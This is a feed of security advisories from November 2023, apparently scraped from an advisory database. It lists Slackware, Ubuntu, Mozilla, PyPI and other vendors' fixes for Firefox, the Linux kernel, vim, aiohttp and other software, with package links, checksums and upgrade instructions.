21.11.2023 23:38:12	slackware	[SSA:2023-325-02] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.5.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. Thanks to zuriel for the taskbar icon fix on Wayland. 🙂 For more information, see: https://www.mozilla.org/en-US/firefox/115.5.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2023-50/ https://www.cve.org/CVERecord?id=CVE-2023-6204 https://www.cve.org/CVERecord?id=CVE-2023-6205 https://www.cve.org/CVERecord?id=CVE-2023-6206 https://www.cve.org/CVERecord?id=CVE-2023-6207 https://www.cve.org/CVERecord?id=CVE-2023-6208 https://www.cve.org/CVERecord?id=CVE-2023-6209 https://www.cve.org/CVERecord?id=CVE-2023-6212 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.5.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.5.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.5.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.5.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:be656147bc1284ff03177a2f0439034a mozilla-firefox-115.5.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:dbefe1e1e364ec89f9525f9a2159ec4b mozilla-firefox-115.5.0esr-x86_64-1_slack15.0.txzSlackware -current package:aa672a0cd13111a53a2c7b8c391a1d47 xap/mozilla-firefox-115.5.0esr-i686-1.txzSlackware x86_64 -current package:80111c7f199e7ed618c30e4ef7b98185 xap/mozilla-firefox-115.5.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.5.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-325-02
21.11.2023 23:37:49	slackware	[SSA:2023-325-01] Slackware 15.0 kernel	New kernel packages are available for Slackware 15.0 to fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/linux-5.15.139/: Upgraded. These updates fix various bugs and security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 5.15.116: https://www.cve.org/CVERecord?id=CVE-2023-35788 https://www.cve.org/CVERecord?id=CVE-2022-45887 https://www.cve.org/CVERecord?id=CVE-2022-45886 https://www.cve.org/CVERecord?id=CVE-2023-3212 https://www.cve.org/CVERecord?id=CVE-2022-45919 Fixed in 5.15.117: https://www.cve.org/CVERecord?id=CVE-2023-2124 https://www.cve.org/CVERecord?id=CVE-2023-34255 Fixed in 5.15.118: https://www.cve.org/CVERecord?id=CVE-2023-3609 https://www.cve.org/CVERecord?id=CVE-2023-3117 https://www.cve.org/CVERecord?id=CVE-2023-3390 https://www.cve.org/CVERecord?id=CVE-2023-3338 Fixed in 5.15.119: https://www.cve.org/CVERecord?id=CVE-2023-3610 Fixed in 5.15.121: https://www.cve.org/CVERecord?id=CVE-2023-31248 https://www.cve.org/CVERecord?id=CVE-2023-38432 https://www.cve.org/CVERecord?id=CVE-2023-3866 https://www.cve.org/CVERecord?id=CVE-2023-2898 https://www.cve.org/CVERecord?id=CVE-2023-44466 https://www.cve.org/CVERecord?id=CVE-2023-4132 https://www.cve.org/CVERecord?id=CVE-2023-3611 https://www.cve.org/CVERecord?id=CVE-2022-48502 https://www.cve.org/CVERecord?id=CVE-2023-3865 https://www.cve.org/CVERecord?id=CVE-2023-35001 https://www.cve.org/CVERecord?id=CVE-2023-3776 https://www.cve.org/CVERecord?id=CVE-2023-3863 Fixed in 5.15.122: https://www.cve.org/CVERecord?id=CVE-2023-20593 Fixed in 5.15.123: https://www.cve.org/CVERecord?id=CVE-2023-3777 https://www.cve.org/CVERecord?id=CVE-2023-4004 Fixed in 5.15.124: https://www.cve.org/CVERecord?id=CVE-2023-4015 https://www.cve.org/CVERecord?id=CVE-2023-4147 https://www.cve.org/CVERecord?id=CVE-2023-1206 Fixed in 5.15.125: https://www.cve.org/CVERecord?id=CVE-2022-40982 https://www.cve.org/CVERecord?id=CVE-2023-20569 Fixed in 5.15.126: https://www.cve.org/CVERecord?id=CVE-2023-20588 https://www.cve.org/CVERecord?id=CVE-2023-4128 https://www.cve.org/CVERecord?id=CVE-2023-4208 https://www.cve.org/CVERecord?id=CVE-2023-4206 https://www.cve.org/CVERecord?id=CVE-2023-4207 https://www.cve.org/CVERecord?id=CVE-2023-40283 Fixed in 5.15.128: https://www.cve.org/CVERecord?id=CVE-2023-4569 https://www.cve.org/CVERecord?id=CVE-2023-39194 https://www.cve.org/CVERecord?id=CVE-2023-4273 https://www.cve.org/CVERecord?id=CVE-2023-3772 Fixed in 5.15.132: https://www.cve.org/CVERecord?id=CVE-2023-4921 https://www.cve.org/CVERecord?id=CVE-2023-4623 https://www.cve.org/CVERecord?id=CVE-2023-42753 https://www.cve.org/CVERecord?id=CVE-2023-42752 https://www.cve.org/CVERecord?id=CVE-2023-39189 https://www.cve.org/CVERecord?id=CVE-2023-4881 https://www.cve.org/CVERecord?id=CVE-2023-45871 https://www.cve.org/CVERecord?id=CVE-2023-39193 https://www.cve.org/CVERecord?id=CVE-2023-39192 Fixed in 5.15.133: https://www.cve.org/CVERecord?id=CVE-2023-42755 Fixed in 5.15.134: https://www.cve.org/CVERecord?id=CVE-2023-42754 https://www.cve.org/CVERecord?id=CVE-2023-4563 https://www.cve.org/CVERecord?id=CVE-2023-4244 https://www.cve.org/CVERecord?id=CVE-2023-5197 Fixed in 5.15.135: https://www.cve.org/CVERecord?id=CVE-2023-34324 https://www.cve.org/CVERecord?id=CVE-2023-31085 https://www.cve.org/CVERecord?id=CVE-2023-5158 Fixed in 5.15.136: https://www.cve.org/CVERecord?id=CVE-2023-35827 Fixed in 5.15.137: https://www.cve.org/CVERecord?id=CVE-2023-46813 https://www.cve.org/CVERecord?id=CVE-2023-5717 https://www.cve.org/CVERecord?id=CVE-2023-5178 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-generic-5.15.139-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-generic-smp-5.15.139_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-headers-5.15.139_smp-x86-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-huge-5.15.139-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-huge-smp-5.15.139_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-modules-5.15.139-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-modules-smp-5.15.139_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-source-5.15.139_smp-noarch-1.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-generic-5.15.139-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-headers-5.15.139-x86-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-huge-5.15.139-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-modules-5.15.139-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-source-5.15.139-noarch-1.txzMD5 signaturesSlackware 15.0 packages:8211588a7ce1578ea991bd5362f7445e kernel-generic-5.15.139-i586-1.txz64037b5079bfe0757445e074c7d3c7cb kernel-generic-smp-5.15.139_smp-i686-1.txz1a500cf7afe8e155302ac974aafa44d1 kernel-headers-5.15.139_smp-x86-1.txzace5996456652d42f14a94c1ba36b4f1 kernel-huge-5.15.139-i586-1.txz6069f8f4da9f93504af0298735dee9aa kernel-huge-smp-5.15.139_smp-i686-1.txz984ad76bb952c3931e89210486466668 kernel-modules-5.15.139-i586-1.txzd0dc77021b8169ed7365130bf221e454 kernel-modules-smp-5.15.139_smp-i686-1.txz96ffc875c55cdecdcf4c52214007d443 kernel-source-5.15.139_smp-noarch-1.txzSlackware x86_64 15.0 packages:c455659e37b122e22a4b53322f6a1795 kernel-generic-5.15.139-x86_64-1.txz97657fcdbdf707709ba8ff24266ef28d kernel-headers-5.15.139-x86-1.txzb02c2557d92e078e1fdc07eda2ebfcc9 kernel-huge-5.15.139-x86_64-1.txzc97c06949033f62acb3e65b51963e2ea kernel-modules-5.15.139-x86_64-1.txz711156b762cb7f2b231fe98a831569a4 kernel-source-5.15.139-noarch-1.txzInstallation instructionsUpgrade the packages as root:`# upgradepkg kernel-.txz`If you are using an initrd, you'll need to rebuild it.For a 32-bit SMP machine, use this command (substitute the appropriatekernel version if you are not running Slackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.139-smp \| bash`For a 64-bit machine, or a 32-bit uniprocessor machine, use this command(substitute the appropriate kernel version if you are not runningSlackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.139 \| bash`Please note that "uniprocessor" has to do with the kernel you are running,not with the CPU. Most systems should run the SMP kernel (if they can)regardless of the number of cores the CPU has. If you aren't sure whichkernel you are running, run "uname -a". If you see SMP there, you arerunning the SMP kernel and should use the 5.15.139-smp version when runningmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bitsystems should always use 5.15.139 as the version.If you are using lilo or elilo to boot the machine, you'll need to ensurethat the machine is properly prepared before rebooting.If using LILO:By default, lilo.conf contains an image= line that references a symlinkthat always points to the correct kernel. No editing should be requiredunless your machine uses a custom lilo.conf. If that is the case, be surethat the image= line references the correct kernel file. Either way,you'll need to run "lilo" as root to reinstall the boot loader.If using elilo:Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wishto use, and then run eliloconfig to update the EFI System Partition.	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-325-01
21.11.2023 21:58:21	ubuntu	[USN-6503-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6503-1
21.11.2023 21:16:50	ubuntu	[USN-6502-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-1
21.11.2023 18:36:15	ubuntu	[USN-6501-1] RabbitMQ vulnerability	RabbitMQ could be made to denial of service if it received a specially craftedHTTP request.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6501-1
21.11.2023 17:42:49	ubuntu	[USN-6500-1] Squid vulnerabilities	Several security issues were fixed in Squid.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6500-1
21.11.2023 17:30:50	ubuntu	[USN-6495-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6495-1
21.11.2023 17:29:41	ubuntu	[USN-6499-1] GnuTLS vulnerability	GnuTLS could be made to expose sensitive information over the network.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6499-1
21.11.2023 17:24:30	ubuntu	[USN-6498-1] FRR vulnerabilities	Several security issues were fixed in FRR.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6498-1
21.11.2023 17:23:51	ubuntu	[USN-6492-1] Mosquitto vulnerabilities	Several security issues were fixed in Mosquitto.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6492-1
21.11.2023 17:17:23	ubuntu	[USN-6497-1] Linux kernel (OEM) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6497-1
21.11.2023 17:14:21	ubuntu	[USN-6496-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6496-1
21.11.2023 16:55:08	ubuntu	[USN-6494-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6494-1
21.11.2023 16:34:43	ubuntu	[USN-6493-2] hibagent update	A security improvement was added to hibagent.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6493-2
21.11.2023 14:59:06	ubuntu	[USN-6493-1] hibagent update	A security improvement was added to hibagent.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6493-1
21.11.2023 11:15:47	ubuntu	[USN-6491-1] Node.js vulnerabilities	Several security issues were fixed in Node.js.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6491-1
21.11.2023 02:00:00	mozilla	[MFSA-2023-49] Security Vulnerabilities fixed in Firefox 120 (high)	- CVE-2023-6204: Out-of-bound memory access in WebGL2 blitFramebuffer (high)On some systems—depending on the graphics settings and drivers—it was possible to force an out-of-bounds read and leak memory data into the images created on the canvas element.- CVE-2023-6205: Use-after-free in MessagePort::Entangled (high)It was possible to cause the use of a MessagePort after it had alreadybeen freed, which could potentially have led to an exploitable crash.- CVE-2023-6206: Clickjacking permission prompts using the fullscreen transition (high)The black fade animation when exiting fullscreen is roughlythe length of the anti-clickjacking delay on permission prompts.It was possible to use this fact to surprise users by luring themto click where the permission grant button would be about to appear.- CVE-2023-6207: Use-after-free in ReadableByteStreamQueueEntry::Buffer (high)Ownership mismanagement led to a use-after-free in ReadableByteStreams- CVE-2023-6208: Using Selection API would copy contents into X11 primary selection. (moderate)When using X11, text selected by the page using the Selection API was erroneously copied into the primary selection, a temporary storage not unlike the clipboard.<br>This bug only affects Firefox on X11. Other systems are unaffected.- CVE-2023-6209: Incorrect parsing of relative URLs starting with "///" (moderate)Relative URLs starting with three slashes were incorrectly parsed, and apath-traversal "/../" part in the path could be used to override thespecified host. This could contribute to security problems in web sites.- CVE-2023-6210: Mixed-content resources not blocked in a javascript: pop-up (low)When an https: web page created a pop-up from a "javascript:" URL,that pop-up was incorrectly allowed to load blockable content suchas iframes from insecure http: URLs- CVE-2023-6211: Clickjacking to load insecure pages in HTTPS-only mode (low)If an attacker needed a user to load an insecure http: page and knewthat user had enabled HTTPS-only mode, the attacker could havetricked the user into clicking to grant an HTTPS-only exceptionif they could get the user to participate in a clicking game.- CVE-2023-6212: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (high)Memory safety bugs present in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2023-6213: Memory safety bugs fixed in Firefox 120 (high)Memory safety bugs present in Firefox 119. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-49
21.11.2023 02:00:00	mozilla	[MFSA-2023-51] Security Vulnerabilities fixed in Firefox for iOS 120 (high)	- CVE-2023-49060: Privilege escalation through <a [referrerpolicy]> in ReaderMode (high)An attacker could have accessed internal pages or data by ex-filtrating a security key from ReaderMode via the <code>referrerpolicy</code> attribute.- CVE-2023-49061: HTML injection in %READER-BYLINE% of ReaderMode (moderate)An attacker could have performed HTML template injection via Reader Mode and exfiltrated user information.	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-51
21.11.2023 02:00:00	mozilla	[MFSA-2023-50] Security Vulnerabilities fixed in Firefox ESR 115.5 (high)	- CVE-2023-6204: Out-of-bound memory access in WebGL2 blitFramebuffer (high)On some systems—depending on the graphics settings and drivers—it was possible to force an out-of-bounds read and leak memory data into the images created on the canvas element.- CVE-2023-6205: Use-after-free in MessagePort::Entangled (high)It was possible to cause the use of a MessagePort after it had alreadybeen freed, which could potentially have led to an exploitable crash.- CVE-2023-6206: Clickjacking permission prompts using the fullscreen transition (high)The black fade animation when exiting fullscreen is roughlythe length of the anti-clickjacking delay on permission prompts.It was possible to use this fact to surprise users by luring themto click where the permission grant button would be about to appear.- CVE-2023-6207: Use-after-free in ReadableByteStreamQueueEntry::Buffer (high)Ownership mismanagement led to a use-after-free in ReadableByteStreams- CVE-2023-6208: Using Selection API would copy contents into X11 primary selection. (moderate)When using X11, text selected by the page using the Selection API was erroneously copied into the primary selection, a temporary storage not unlike the clipboard.<br>This bug only affects Firefox on X11. Other systems are unaffected.- CVE-2023-6209: Incorrect parsing of relative URLs starting with "///" (moderate)Relative URLs starting with three slashes were incorrectly parsed, and apath-traversal "/../" part in the path could be used to override thespecified host. This could contribute to security problems in web sites.- CVE-2023-6212: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (high)Memory safety bugs present in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-50
21.11.2023 02:00:00	mozilla	[MFSA-2023-52] Security Vulnerabilities fixed in Thunderbird 115.5.0 (high)	In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts.	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-52
22.11.2023 21:38:40	slackware	[SSA:2023-326-01] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.5.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.5.0/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2023-52/ https://www.cve.org/CVERecord?id=CVE-2023-6204 https://www.cve.org/CVERecord?id=CVE-2023-6205 https://www.cve.org/CVERecord?id=CVE-2023-6206 https://www.cve.org/CVERecord?id=CVE-2023-6207 https://www.cve.org/CVERecord?id=CVE-2023-6208 https://www.cve.org/CVERecord?id=CVE-2023-6209 https://www.cve.org/CVERecord?id=CVE-2023-6212 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.5.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.5.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.5.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.5.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:49778e0f1eb283c7648551a2efabdc08 mozilla-thunderbird-115.5.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:5f18d28e932f51cc691cc12bea57d752 mozilla-thunderbird-115.5.0-x86_64-1_slack15.0.txzSlackware -current package:08f1120063ed1d48712c10b2ebf9ce67 xap/mozilla-thunderbird-115.5.0-i686-1.txzSlackware x86_64 -current package:72e06c95e079435f3376b96cfd38a912 xap/mozilla-thunderbird-115.5.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.5.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-326-01
22.11.2023 18:12:50	ubuntu	[USN-6507-1] GlusterFS vulnerability	GlusterFS could be made to crash if it received a specially craftedrequest.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6507-1
22.11.2023 16:55:30	ubuntu	[USN-6506-1] Apache HTTP Server vulnerabilities	Several security issues were fixed in Apache HTTP Server.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6506-1
22.11.2023 16:45:49	ubuntu	[USN-6505-1] nghttp2 vulnerability	nghttp2 could be made to consume resources if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6505-1
22.11.2023 15:02:32	ubuntu	[USN-6504-1] tracker-miners vulnerability	A system hardening measure could be bypassed.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6504-1
22.11.2023 13:21:52	pypi	[PYSEC-2023-244] apache-submarine vulnerability	Apache Software Foundation Apache Submarine has an SQL injection vulnerability when a user logs in. This issue can result in unauthorized login.Now we have fixed this issue and now user must have the correct login to access workbench.This issue affects Apache Submarine: from 0.7.0 before 0.8.0. We recommend that all submarine users with 0.7.0 upgrade to 0.8.0, which not only fixes the issue, supports the oidc authentication mode, but also removes the case of unauthenticated logins.If using the version lower than 0.8.0 and not want to upgrade, you can try cherry-pick PR https://github.com/apache/submarine/pull/1037 https://github.com/apache/submarine/pull/1054 and rebuild the submarine-server image to fix this.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-244
22.11.2023 04:43:48	pypi	[PYSEC-2023-242] httpie vulnerability	Missing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-242
22.11.2023 04:43:48	pypi	[PYSEC-2023-243] localstack vulnerability	Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
22.11.2023 21:19:42	pypi	[PYSEC-2023-245] pypinksign vulnerability	PyPinkSign v0.5.1 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption. This vulnerability can lead to the disclosure of information and communications.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-245
23.11.2023 01:23:57	pypi	[PYSEC-2023-246] aiohttp vulnerability	aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. The HTTP parser in AIOHTTP has numerous problems with header parsing, which could lead to request smuggling. This parser is only used when AIOHTTP_NO_EXTENSIONS is enabled (or not using a prebuilt wheel). These bugs have been addressed in commit `d5c12ba89` which has been included in release version 3.8.6. Users are advised to upgrade. There are no known workarounds for these issues.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-246
23.11.2023 01:23:57	pypi	[PYSEC-2023-247] aiohttp vulnerability	aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Affected versions of aiohttp have a security vulnerability regarding the inconsistent interpretation of the http protocol. HTTP/1.1 is a persistent protocol, if both Content-Length(CL) and Transfer-Encoding(TE) header values are present it can lead to incorrect interpretation of two entities that parse the HTTP and we can poison other sockets with this incorrect interpretation. A possible Proof-of-Concept (POC) would be a configuration with a reverse proxy(frontend) that accepts both CL and TE headers and aiohttp as backend. As aiohttp parses anything with chunked, we can pass a chunked123 as TE, the frontend entity will ignore this header and will parse Content-Length. The impact of this vulnerability is that it is possible to bypass any proxy rule, poisoning sockets to other users like passing Authentication Headers, also if it is present an Open Redirect an attacker could combine it to redirect random users to another website and log the request. This vulnerability has been addressed in release 3.8.0 of aiohttp. Users are advised to upgrade. There are no known workarounds for this vulnerability.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-247
22.11.2023 10:00:00	msrc	[MS:CVE-2023-36025] Windows SmartScreen Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36025
23.11.2023 23:29:47	ubuntu	[USN-6513-1] Python vulnerabilities	Several security issues were fixed in Python.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6513-1
23.11.2023 23:06:23	ubuntu	[USN-6512-1] LibTIFF vulnerabilities	Several security issues were fixed in LibTIFF.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6512-1
23.11.2023 15:50:30	ubuntu	[USN-6511-1] OpenZFS vulnerability	OpenZFS could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6511-1
23.11.2023 12:32:24	ubuntu	[USN-6510-1] Apache HTTP Server vulnerability	Apache HTTP Server could be made to crash if it received a speciallycrafted request.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6510-1
23.11.2023 07:39:06	ubuntu	[USN-6509-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6509-1
23.11.2023 04:47:28	ubuntu	[USN-6508-1] poppler vulnerabilities	Several security issues were fixed in poppler.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6508-1
23.11.2023 10:38:27	almalinux	[ALSA-2023:7465] squid security update (important)	squid security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7465
24.11.2023 22:58:39	slackware	[SSA:2023-328-01] vim	New vim packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/vim-9.0.2127-i586-1_slack15.0.txz: Upgraded. Fixed security issues. Thanks to marav for the heads-up. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-48231 https://www.cve.org/CVERecord?id=CVE-2023-48232 https://www.cve.org/CVERecord?id=CVE-2023-48233 https://www.cve.org/CVERecord?id=CVE-2023-48234 https://www.cve.org/CVERecord?id=CVE-2023-48235 https://www.cve.org/CVERecord?id=CVE-2023-48236 https://www.cve.org/CVERecord?id=CVE-2023-48237 (* Security fix )patches/packages/vim-gvim-9.0.2127-i586-1_slack15.0.txz: Upgraded.```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/vim-9.0.2127-i586-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/vim-gvim-9.0.2127-i586-1_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/vim-9.0.2127-x86_64-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/vim-gvim-9.0.2127-x86_64-1_slack15.0.txzUpdated packages for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/vim-9.0.2127-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/vim-gvim-9.0.2127-i586-1.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/vim-9.0.2127-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/vim-gvim-9.0.2127-x86_64-1.txzMD5 signaturesSlackware 15.0 packages:c0072756362f34fa5fc1121d49481d48 vim-9.0.2127-i586-1_slack15.0.txzc8fc94e220e7d1f88962b52a0a378d83 vim-gvim-9.0.2127-i586-1_slack15.0.txzSlackware x86_64 15.0 packages:3b8a942d068343c6d8c0df5057bf6aee vim-9.0.2127-x86_64-1_slack15.0.txze8463e28282a9d3dd47888071db2f027 vim-gvim-9.0.2127-x86_64-1_slack15.0.txzSlackware -current packages:a7f26ee78d9ef0d72b543eb695f22aea ap/vim-9.0.2127-i586-1.txz01b7e7b14e4c81d6f20865d9fce48670 xap/vim-gvim-9.0.2127-i586-1.txzSlackware x86_64 -current packages:3fd98cb7c623b08451d9d582560994c8 ap/vim-9.0.2127-x86_64-1.txzd5512b67b25af76d003359e69e39b6c3 xap/vim-gvim-9.0.2127-x86_64-1.txzInstallation instructions*Upgrade the packages as root:`# upgradepkg vim-9.0.2127-i586-1_slack15.0.txz vim-gvim-9.0.2127-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-328-01
24.11.2023 02:00:00	gentoo	[GLSA-202311-03] SQLite: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in SQLite, the worst of which may lead to code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-03
24.11.2023 02:00:00	gentoo	[GLSA-202311-04] Zeppelin: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Zeppelin, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-04
24.11.2023 02:00:00	gentoo	[GLSA-202311-05] LinuxCIFS utils: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in LinuxCIFS utils, the worst of which can lead to local root privilege escalation.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-05
